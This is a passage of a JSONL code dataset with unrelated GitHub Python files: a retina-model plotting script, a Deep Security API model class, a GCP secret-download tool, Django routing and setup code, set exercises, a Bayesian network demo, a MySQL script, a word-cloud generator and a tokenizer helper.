bkg_illuminance\n\n # update dynamics of the model\n cone.feedInput(input)\n cone.update()\n # record response values\n time.append(t*step)\n response[0,t] = input\n response[1,t] = cone.LF_tauE.last_values[0]\n response[2,t] = cone.beta\n response[3,t] = cone.Q\n response[4,t] = cone.Q / cone.alpha\n response[5,t] = cone.LF_X.last_values[0]\n response[6,t] = cone.LF_tauC.last_values[0]\n response[7,t] = cone.alpha\n response[8,t] = cone.LF_taum.last_values[0] - Vis_dark\n response[9,t] = cone.gi\n response[10,t] = cone.LF_taum.last_values[0] -\\\n cone.LF_tauh.last_values[0]\n response[11,t] = cone.It\n response[12,t] = cone.LF_tau2.last_values[0]\n response[13,t] = cone.LF_tauh.last_values[0] - Vh_dark\n\n\n # Plot response of the different processing stages\n f, axarr = plt.subplots(7, 2)\n f.subplots_adjust(hspace=1.5)\n f.subplots_adjust(wspace=0.4)\n\n row = 0\n col = 0\n for k in np.arange(14):\n # First 300 ms are discarded\n axarr[row,col].plot(time[int(300.0/step):len(time)],\n response[k,int(300.0/step):len(time)])\n plt.setp(axarr[row,col], yticks=\n [(np.min(response[k,int(300.0/step):len(time)])),\n (np.max(response[k,int(300.0/step):len(time)]))],\n yticklabels=\n [str(round(np.min(response[k,int(300.0/step):len(time)]),2)),\n str(round(np.max(response[k,int(300.0/step):len(time)]),2))])\n if(k<6):\n col = 0\n row+=1\n elif(k==6):\n col = 1\n row = 0\n else:\n col = 1\n row+=1\n\n\n axarr[0,0].set_title('Illuminance (td)')\n axarr[1,0].set_title('E*')\n axarr[2,0].set_title('Beta')\n axarr[3,0].set_title('1/Beta')\n axarr[4,0].set_title('alpha/Beta')\n axarr[5,0].set_title('X')\n axarr[6,0].set_title('C')\n axarr[0,1].set_title('1/alpha')\n axarr[1,1].set_title('Vis - Vis_dark')\n axarr[2,1].set_title('gi')\n axarr[3,1].set_title('Vs')\n axarr[4,1].set_title('It')\n axarr[5,1].set_title('Vb')\n axarr[6,1].set_title('Vh - Vh_dark')\n axarr[6,0].set_xlabel('time (ms)')\n axarr[6,1].set_xlabel('time (ms)')\n\n plt.show()\n\nif __name__ == 
'__main__':\n main()\n","repo_name":"pablomc88/Primate_Visual_System","sub_path":"simulation/retina/test_vanHateren.py","file_name":"test_vanHateren.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"34423385205","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated.
    Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\n\r\nclass ApplicationType(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'name': 'str',\r\n 'description': 'str',\r\n 'minimum_agent_version': 'str',\r\n 'direction': 'str',\r\n 'protocol': 'str',\r\n 'port_type': 'str',\r\n 'port_multiple': 'list[str]',\r\n 'port_list_id': 'int',\r\n 'recommendations_mode': 'str',\r\n 'id': 'int'\r\n }\r\n\r\n attribute_map = {\r\n 'name': 'name',\r\n 'description': 'description',\r\n 'minimum_agent_version': 'minimumAgentVersion',\r\n 'direction': 'direction',\r\n 'protocol': 'protocol',\r\n 'port_type': 'portType',\r\n 'port_multiple': 'portMultiple',\r\n 'port_list_id': 'portListID',\r\n 'recommendations_mode': 'recommendationsMode',\r\n 'id': 'ID'\r\n }\r\n\r\n def __init__(self, name=None, description=None, minimum_agent_version=None, direction=None, protocol=None, port_type=None, port_multiple=None, port_list_id=None, recommendations_mode=None, id=None): # noqa: E501\r\n \"\"\"ApplicationType - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._name = None\r\n self._description = None\r\n self._minimum_agent_version = None\r\n self._direction = None\r\n self._protocol = None\r\n self._port_type = None\r\n self._port_multiple = None\r\n self._port_list_id = None\r\n self._recommendations_mode = None\r\n self._id = None\r\n self.discriminator = None\r\n\r\n if name is not None:\r\n self.name = name\r\n if description is not None:\r\n self.description = description\r\n if minimum_agent_version is not None:\r\n self.minimum_agent_version = minimum_agent_version\r\n if direction is not None:\r\n self.direction = direction\r\n if protocol is not None:\r\n self.protocol = protocol\r\n if port_type is not None:\r\n self.port_type = port_type\r\n if port_multiple is not None:\r\n self.port_multiple = port_multiple\r\n if port_list_id is not None:\r\n self.port_list_id = port_list_id\r\n if recommendations_mode is not None:\r\n self.recommendations_mode = recommendations_mode\r\n if id is not None:\r\n self.id = id\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Gets the name of this ApplicationType. # noqa: E501\r\n\r\n Display name of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :return: The name of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._name\r\n\r\n @name.setter\r\n def name(self, name):\r\n \"\"\"Sets the name of this ApplicationType.\r\n\r\n Display name of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param name: The name of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._name = name\r\n\r\n @property\r\n def description(self):\r\n \"\"\"Gets the description of this ApplicationType. # noqa: E501\r\n\r\n Description of the ApplicationType. 
Searchable as String. # noqa: E501\r\n\r\n :return: The description of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._description\r\n\r\n @description.setter\r\n def description(self, description):\r\n \"\"\"Sets the description of this ApplicationType.\r\n\r\n Description of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param description: The description of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._description = description\r\n\r\n @property\r\n def minimum_agent_version(self):\r\n \"\"\"Gets the minimum_agent_version of this ApplicationType. # noqa: E501\r\n\r\n Version of the Deep Security agent or appliance required to support the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :return: The minimum_agent_version of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._minimum_agent_version\r\n\r\n @minimum_agent_version.setter\r\n def minimum_agent_version(self, minimum_agent_version):\r\n \"\"\"Sets the minimum_agent_version of this ApplicationType.\r\n\r\n Version of the Deep Security agent or appliance required to support the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param minimum_agent_version: The minimum_agent_version of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._minimum_agent_version = minimum_agent_version\r\n\r\n @property\r\n def direction(self):\r\n \"\"\"Gets the direction of this ApplicationType. # noqa: E501\r\n\r\n Direction of the initial communication for the ApplicationType (e.g. 'outgoing' for web browsers). Searchable as Choice. # noqa: E501\r\n\r\n :return: The direction of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._direction\r\n\r\n @direction.setter\r\n def direction(self, direction):\r\n \"\"\"Sets the direction of this ApplicationType.\r\n\r\n Direction of the initial communication for the ApplicationType (e.g. 'outgoing' for web browsers). Searchable as Choice. # noqa: E501\r\n\r\n :param direction: The direction of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"incoming\", \"outgoing\"] # noqa: E501\r\n if direction not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `direction` ({0}), must be one of {1}\" # noqa: E501\r\n .format(direction, allowed_values)\r\n )\r\n\r\n self._direction = direction\r\n\r\n @property\r\n def protocol(self):\r\n \"\"\"Gets the protocol of this ApplicationType. # noqa: E501\r\n\r\n Protocol used by the ApplicationType. Searchable as Choice. # noqa: E501\r\n\r\n :return: The protocol of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._protocol\r\n\r\n @protocol.setter\r\n def protocol(self, protocol):\r\n \"\"\"Sets the protocol of this ApplicationType.\r\n\r\n Protocol used by the ApplicationType. Searchable as Choice. # noqa: E501\r\n\r\n :param protocol: The protocol of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"icmp\", \"tcp\", \"udp\", \"tcp-udp\"] # noqa: E501\r\n if protocol not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `protocol` ({0}), must be one of {1}\" # noqa: E501\r\n .format(protocol, allowed_values)\r\n )\r\n\r\n self._protocol = protocol\r\n\r\n @property\r\n def port_type(self):\r\n \"\"\"Gets the port_type of this ApplicationType. # noqa: E501\r\n\r\n Port number configuration type. Searchable as Choice. 
# noqa: E501\r\n\r\n :return: The port_type of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._port_type\r\n\r\n @port_type.setter\r\n def port_type(self, port_type):\r\n \"\"\"Sets the port_type of this ApplicationType.\r\n\r\n Port number configuration type. Searchable as Choice. # noqa: E501\r\n\r\n :param port_type: The port_type of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"any\", \"multiple\", \"port-list\"] # noqa: E501\r\n if port_type not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `port_type` ({0}), must be one of {1}\" # noqa: E501\r\n .format(port_type, allowed_values)\r\n )\r\n\r\n self._port_type = port_type\r\n\r\n @property\r\n def port_multiple(self):\r\n \"\"\"Gets the port_multiple of this ApplicationType. # noqa: E501\r\n\r\n If portType is multiple, the list of port numbers the ApplicationType monitors. Searchable as String. # noqa: E501\r\n\r\n :return: The port_multiple of this ApplicationType. # noqa: E501\r\n :rtype: list[str]\r\n \"\"\"\r\n return self._port_multiple\r\n\r\n @port_multiple.setter\r\n def port_multiple(self, port_multiple):\r\n \"\"\"Sets the port_multiple of this ApplicationType.\r\n\r\n If portType is multiple, the list of port numbers the ApplicationType monitors. Searchable as String. # noqa: E501\r\n\r\n :param port_multiple: The port_multiple of this ApplicationType. # noqa: E501\r\n :type: list[str]\r\n \"\"\"\r\n\r\n self._port_multiple = port_multiple\r\n\r\n @property\r\n def port_list_id(self):\r\n \"\"\"Gets the port_list_id of this ApplicationType. # noqa: E501\r\n\r\n If portType is port-list, ID of the PortList containing the port numbers the ApplicationType monitors. Set to 0 to remove any assignment. Searchable as Numeric. # noqa: E501\r\n\r\n :return: The port_list_id of this ApplicationType. # noqa: E501\r\n :rtype: int\r\n \"\"\"\r\n return self._port_list_id\r\n\r\n @port_list_id.setter\r\n def port_list_id(self, port_list_id):\r\n \"\"\"Sets the port_list_id of this ApplicationType.\r\n\r\n If portType is port-list, ID of the PortList containing the port numbers the ApplicationType monitors. Set to 0 to remove any assignment. Searchable as Numeric. # noqa: E501\r\n\r\n :param port_list_id: The port_list_id of this ApplicationType. # noqa: E501\r\n :type: int\r\n \"\"\"\r\n\r\n self._port_list_id = port_list_id\r\n\r\n @property\r\n def recommendations_mode(self):\r\n \"\"\"Gets the recommendations_mode of this ApplicationType. # noqa: E501\r\n\r\n Indicates whether recommendation scans consider the ApplicationType. Create an ApplicationType computer or policy override to modify this value. Searchable as Choice. # noqa: E501\r\n\r\n :return: The recommendations_mode of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._recommendations_mode\r\n\r\n @recommendations_mode.setter\r\n def recommendations_mode(self, recommendations_mode):\r\n \"\"\"Sets the recommendations_mode of this ApplicationType.\r\n\r\n Indicates whether recommendation scans consider the ApplicationType. Create an ApplicationType computer or policy override to modify this value. Searchable as Choice. # noqa: E501\r\n\r\n :param recommendations_mode: The recommendations_mode of this ApplicationType. 
# noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"enabled\", \"ignored\", \"unknown\", \"disabled\"] # noqa: E501\r\n if recommendations_mode not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `recommendations_mode` ({0}), must be one of {1}\" # noqa: E501\r\n .format(recommendations_mode, allowed_values)\r\n )\r\n\r\n self._recommendations_mode = recommendations_mode\r\n\r\n @property\r\n def id(self):\r\n \"\"\"Gets the id of this ApplicationType. # noqa: E501\r\n\r\n ID of the ApplicationType. Searchable as ID. # noqa: E501\r\n\r\n :return: The id of this ApplicationType. # noqa: E501\r\n :rtype: int\r\n \"\"\"\r\n return self._id\r\n\r\n @id.setter\r\n def id(self, id):\r\n \"\"\"Sets the id of this ApplicationType.\r\n\r\n ID of the ApplicationType. Searchable as ID. # noqa: E501\r\n\r\n :param id: The id of this ApplicationType. # noqa: E501\r\n :type: int\r\n \"\"\"\r\n\r\n self._id = id\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(ApplicationType, dict):\r\n for key, value in self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, ApplicationType):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/application_type.py","file_name":"application_type.py","file_ext":"py","file_size_in_byte":13892,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"20688756306","text":"import argparse\r\nimport gc_cryption\r\nimport gc_storage\r\nimport gc_path\r\n\r\n\r\ndef download_secret(secret_name,\r\n project_name,\r\n bucket_name,\r\n keyring_name,\r\n key_name,\r\n *args, **kwargs\r\n ):\r\n bucket = gc_storage.get_bucket(bucket_name)\r\n full_file_name = 'secrets/{}'.format(\r\n # Assume that any encrypted file\r\n # ends with '.encrypted'.\r\n gc_path.set_extension(secret_name)\r\n )\r\n secret_blob = bucket.blob(full_file_name)\r\n\r\n ciphertext = secret_blob.download_as_string()\r\n plaintext = gc_cryption.decrypt_secret(\r\n ciphertext,\r\n project_name,\r\n keyring_name,\r\n key_name\r\n )\r\n\r\n if kwargs['out']:\r\n file_path = gc_path.solve_file_path(secret_name, kwargs['out'])\r\n gc_path.save_to_file(file_path, plaintext, create_dir=True)\r\n else:\r\n print(plaintext)\r\n\r\n\r\ndef _get_argparser(start_function):\r\n argparser = argparse.ArgumentParser()\r\n argparser.set_defaults(method=start_function)\r\n\r\n 
argparser.add_argument(\r\n 'secret_name',\r\n help='Name of secret file to download.\\n' +\r\n 'Assume file name to end with \\'.encrypted\\'.'\r\n )\r\n argparser.add_argument(\r\n 'project_name',\r\n help='Name of GCP Project.'\r\n )\r\n argparser.add_argument(\r\n 'bucket_name',\r\n help='Name of GCP bucket where your secrets are found.'\r\n )\r\n argparser.add_argument(\r\n 'keyring_name',\r\n help='Name of GCP keyring where your cryptokey is located.'\r\n )\r\n argparser.add_argument(\r\n 'key_name',\r\n help='Name of GCP cryptokey.'\r\n )\r\n argparser.add_argument(\r\n '--out',\r\n help='If specified, save the decrypted plaintext' +\r\n ' to the given path.'\r\n )\r\n\r\n return argparser\r\n\r\n\r\ndef main():\r\n argparser = _get_argparser(start_function=download_secret)\r\n args = argparser.parse_args()\r\n args.method(**vars(args))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"knowit/hlf","sub_path":"secrets_handler/download_secret.py","file_name":"download_secret.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74223823208","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^registration_attempt$', views.register),\n url(r'^login_attempt$', views.login),\n url(r'^success$', views.success),\n url(r'^books/add$', views.add),\n url(r'^make_book_entry$', views.make_book_entry),\n url(r'^book/(?P\\d+)$', views.display_book),\n url(r'^logout$', views.logout),\n url(r'^home$', views.home),\n url(r'^user/(?P\\d+)$', views.show_user),\n url(r'^destroy/(?P\\d+)/(?P\\d+)$', views.destroy),\n url(r'^add_review$', views.add_review),\n]\n","repo_name":"cd-chicago-june-cohort/jp-django","sub_path":"belt_reviewer/apps/book_reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24391554866","text":"import os\nimport subprocess\n\nfrom django.db import connections\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.core.management.base import CommandError\n\nfrom django.db.utils import ConnectionDoesNotExist\n\n\nclass Command(BaseCommand):\n help = 'Acts as an entrypoint for the database in docker, from the app container'\n\n def add_arguments(self, parser):\n parser.add_argument('--database',\n action='store',\n dest='database',\n default='default',\n help='Database connection name')\n parser.add_argument('--recreate',\n dest='recreate',\n action='store_true')\n\n def handle(self, *args, **options):\n call_command('wait_for_database', database=options['database'])\n\n try:\n connection = connections[options['database']]\n connection.cursor()\n\n except ConnectionDoesNotExist:\n raise CommandError('Database \"%s\" does not exist in '\n 'settings' % options['database'])\n\n if options['recreate']:\n call_command('recreate_database')\n\n self.stdout.write('Running migrations')\n call_command('migrate', no_input=True)\n\n self.stdout.write('Loading fixtures')\n fixtures = [\n 'apps/core/fixtures/initial_data.json',\n 'apps/user/fixtures/user_data.json',\n ]\n call_command('loaddata', 
*fixtures)\n","repo_name":"motius/django-api","sub_path":"apps/utils/management/commands/db_entrypoint.py","file_name":"db_entrypoint.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9822267279","text":"conjunto = {1, 2, 3, 4, 4, 5, 5, 6, 6}\nconjunto2 = {7, 8, 9, 10, 1, 2}\nuniaoConjunto = conjunto.union(conjunto2)\nconjuntoInterseccao = conjunto.intersection(conjunto2)\nconjuntoDiferenca = conjunto.difference(conjunto2)\nconjuntoDiferenca2 = conjunto2.difference(conjunto)\ndiferencaSimetrica = conjunto.symmetric_difference(conjunto2)\n\n\nprint('União dos conjuntos {}'.format(uniaoConjunto))\nprint('Intersecção dos conjuntos {}'.format(conjuntoInterseccao))\nprint('Diferença entre 1 e 2 {}'.format(conjuntoDiferenca))\nprint('Diferença entre 2 e 1 {}'.format(conjuntoDiferenca2))\nprint('Diferença simetrica {}'.format(diferencaSimetrica))\n\nconjuntoA = {1, 2, 3}\nconjuntoB = {1, 2, 3, 4, 5}\nconjunto_subset = conjuntoA.issubset(conjuntoB)\nconjunto_subsetA = conjunto.issubset(conjuntoA)\n\n\nprint('O conjunto A é um Subconjunto do conjunto B?{}'.format(conjunto_subset))\nprint('O conjunto B é um Subconjunto do conjunto A?{}'.format(conjunto_subsetA))\n\n#O conjunto não pode conter mais de um elemento igual\n\n\nlista = ['cachorro', 'gato', 'cachorro', 'elefante'] \nconjuntoAnimais = set(lista) #Transformando lista em conjunto\nprint(conjuntoAnimais)\n\n\n \n","repo_name":"Adsandro/DIO-Python","sub_path":"Estudos/conjunto.py","file_name":"conjunto.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5982682434","text":"import pandas as pd\r\nfrom pgmpy.models import BayesianNetwork\r\nfrom pgmpy.estimators import ParameterEstimator\r\nfrom pgmpy.estimators import MaximumLikelihoodEstimator\r\nfrom pgmpy.inference import VariableElimination\r\n\r\n# Define the dataset\r\ndata = pd.DataFrame({\r\n 'Weather': ['Sunny', 'Sunny', 'Overcast', 'Rainy', 'Rainy', 'Overcast', 'Sunny', 'Sunny', 'Rainy', 'Sunny', 'Overcast', 'Overcast', 'Rainy'],\r\n 'Temperature': ['Hot', 'Hot', 'Hot', 'Mild', 'Cool', 'Cool', 'Mild', 'Cool', 'Mild', 'Mild', 'Mild', 'Hot', 'Mild'],\r\n 'Humidity': ['High', 'High', 'High', 'High', 'Normal', 'Normal', 'High', 'Normal', 'Normal', 'Normal', 'High', 'Normal', 'High'],\r\n 'PlayTennis': ['No', 'No', 'Yes', 'Yes', 'Yes', 'Yes', 'No', 'Yes', 'Yes', 'Yes', 'Yes', 'Yes', 'No']\r\n})\r\n\r\n# Create a Bayesian Network model\r\nmodel = BayesianNetwork()\r\n\r\n# Define the variables based on the columns in the dataset\r\nvariables = list(data.columns)\r\n\r\n# Add nodes (variables) to the model with the correct names\r\nfor variable in variables:\r\n model.add_node(variable)\r\n\r\n# Define the structure (directed edges) of the Bayesian network\r\nmodel.add_edge(\"Weather\", \"PlayTennis\")\r\nmodel.add_edge(\"Temperature\", \"PlayTennis\")\r\nmodel.add_edge(\"Humidity\", \"PlayTennis\")\r\n\r\n# Use Maximum Likelihood Estimation (MLE) to estimate CPDs from the data\r\nestimator = ParameterEstimator(model, data)\r\nmodel.fit(data, estimator=MaximumLikelihoodEstimator)\r\n\r\n# Check the model for consistency\r\nassert model.check_model()\r\n\r\n# Create an inference object using Variable Elimination\r\ninference = VariableElimination(model)\r\n\r\n# Perform inference to calculate probabilities\r\n\r\n# Calculate the probability of playing tennis given certain 
conditions\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Sunny'})\r\nprint(\"Probability of playing tennis given Sunny weather:\")\r\nprint(result)\r\n\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Temperature': 'Mild', 'Humidity': 'Normal'})\r\nprint(\"\\nProbability of playing tennis given Mild temperature and Normal humidity:\")\r\nprint(result)\r\n\r\n# You can perform more inference queries as needed\r\n# Calculate the probability of playing tennis given Rainy weather\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Rainy'})\r\nprint(\"\\nProbability of playing tennis given Rainy weather:\")\r\nprint(result)\r\n\r\n# Calculate the probability of playing tennis given Cool temperature\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Temperature': 'Cool'})\r\nprint(\"\\nProbability of playing tennis given Cool temperature:\")\r\nprint(result)\r\n\r\n# Calculate the probability of playing tennis given Overcast weather and High humidity\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Overcast', 'Humidity': 'High'})\r\nprint(\"\\nProbability of playing tennis given Overcast weather and High humidity:\")\r\nprint(result)\r\n","repo_name":"Dragoon-galaxy/AI_practicals","sub_path":"6_Bayesian _net_infer.py","file_name":"6_Bayesian _net_infer.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19220500510","text":"import mysql.connector\nfrom mysql.connector import Error\nimport pandas as pd\nfrom constant import *\n\ncolumns = [\"First naem\", \"Last name\"]\nnew_result = []\n\ndef create_server_connection(host_name, user_name, user_password, db_name):\n connection = None\n try:\n connection = mysql.connector.connect(\n host = host_name,\n user = user_name,\n passwd = user_password,\n database = db_name\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n return connection\n\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query executed successfully\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\ndef execute_read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n print(\"Query executed successfully\")\n return result\n except Error as err:\n print(f\"Error: '{err}'\")\n\n\ncreate_table_query = \"\"\"\nCREATE TABLE Staff(\n\tstaffNo VARCHAR(4) PRIMARY KEY,\n\tfName VARCHAR(25) NOT NULL,\n\tlName VARCHAR(25) NOT NULL,\n\tposition VARCHAR(15) NOT NULL,\n\tdob DATE NOT NULL,\n\tsalary DECIMAL(7,2) NOT NULL,\n\tbranchNo VARCHAR(4),\n\tFOREIGN KEY (branchNo) REFERENCES Branch(branchNo)\n) ENGINE INNODB;\n\"\"\"\n\ninsert_staff = \"\"\"\nINSERT INTO Staff (staffNo, fName, lName, position,dob, salary, branchNo)\nVALUES ('SL21', 'John', 'White', 'Manager', '1945-10-01', 30000, 'B005'),\n ('SG37', 'Ann', 'Beech', 'Assistant', '1960-11-10', 12000, 'B003'),\n ('SG14', 'David', 'Ford', 'Supervisor', '1958-03-24', 18000, 'B003'),\n ('SA9', 'Mary', 'Howe', 'Assistant', '1970-02-19',9000, 'B007'),\n ('SG5', 'Susan', 'Brand', 'Manager', '1940-06-03', 24000, 'B003'),\n ('SL41', 'Julie', 'Lee', 'Assistant', '1965-06-13', 9000, 'B005');\n\"\"\"\n\nselect_staff = \"\"\"\nSELECT fName, lName FROM Staff;\n\"\"\"\n\ndelete_staff = \"\"\"\nDELETE FROM Staff WHERE 
staffNo = 'SL41';\n\"\"\"\n\nconnection = create_server_connection(\"localhost\",\"root\",PASSWORD,\"bank\")\nexecute_query(connection, create_table_query)\nexecute_query(connection, insert_staff)\nresults = execute_read_query(connection, select_staff)\nexecute_query(connection, delete_staff)\nresults = execute_read_query(connection, select_staff)\n\nfor result in results:\n result = list(result)\n new_result.append(result)\n\n\ndf = pd.DataFrame(new_result, columns=columns)\nprint(df)","repo_name":"MiDev7/CST1510","sub_path":"week20_M00931468/Typical/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5429672128","text":"import numpy as np\r\nfrom PIL import Image\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\r\n\r\n#importing text\r\nmarcetFile = open(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcetConversations.txt\", \"r\", encoding=\"utf-8\")\r\nmarcetTxt = marcetFile.read()\r\n\r\n#defining words to exclude\r\nstopwords = set(STOPWORDS)\r\nstopwords.update([\"will\", \"may\", \"must\"])\r\n\r\n#importing image\r\nmarcetMask = np.array(Image.open(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcet.png\"))\r\n\r\n#generating word cloud\r\nmarcet_wc = WordCloud(font_path=\"C:\\\\WINDOWS\\\\FONTS\\\\sylfaen.TTF\", max_words = 100000, mask = marcetMask, stopwords=stopwords, background_color=None, mode = \"RGBA\")\r\nmarcet_wc.generate(marcetTxt)\r\n\r\n#generating colors from image\r\nimage_colors = ImageColorGenerator(marcetMask)\r\nplt.imshow(marcet_wc.recolor(color_func=image_colors), interpolation=\"bilinear\")\r\n\r\n#saving and showing word cloud\r\nplt.axis(\"off\")\r\nplt.savefig(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcetCloud.png\", transparent=True, dpi = 300)\r\nplt.show()\r\n\r\n#closing text\r\nmarcetFile.close()\r\n","repo_name":"chrissimmerman/Political-Economy-Word-Clouds","sub_path":"programs/marcetProgram.py","file_name":"marcetProgram.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11159027811","text":"import os\nimport pickle\nfrom nltk.tokenize import sent_tokenize\nfrom transformers import AutoTokenizer\n\n'''\nFormat the summary article pairs in the modified dataset\nso that they can be fed to the BERTSum model.\n'''\n\ndef get_sentence_token_ids(text, tokenizer, sentences=None):\n # Split the text into tokens by mapping the index of original text to index of tokens\n sents = sent_tokenize(text)\n # get start and end index for each sentence from the plain text\n start = []\n for s in sents:\n if len(start) != 0:\n start.append(text[start[-1]:].index(s) + start[-1]) # add sentences sequentially\n else:\n start.append(text.index(s))\n end = [start[i] for i in range(1, len(start))] + [len(text)]\n \n encoded = tokenizer(text, max_length=512, truncation=True) \n\n tok_s = []\n tok_e = []\n for s, e in zip(start, end):\n for i, t in enumerate(encoded.tokens()):\n try:\n ids = encoded.token_to_chars(i) # start token\n except TypeError:\n ids = None\n if ids == None:\n continue\n ss = ids.start\n ee = ids.end\n if ss == s:\n tok_s.append(i)\n break\n tok_e = [s for s in tok_s[1:]] + [len(encoded.tokens())]\n\n assert(len(tok_s) == 
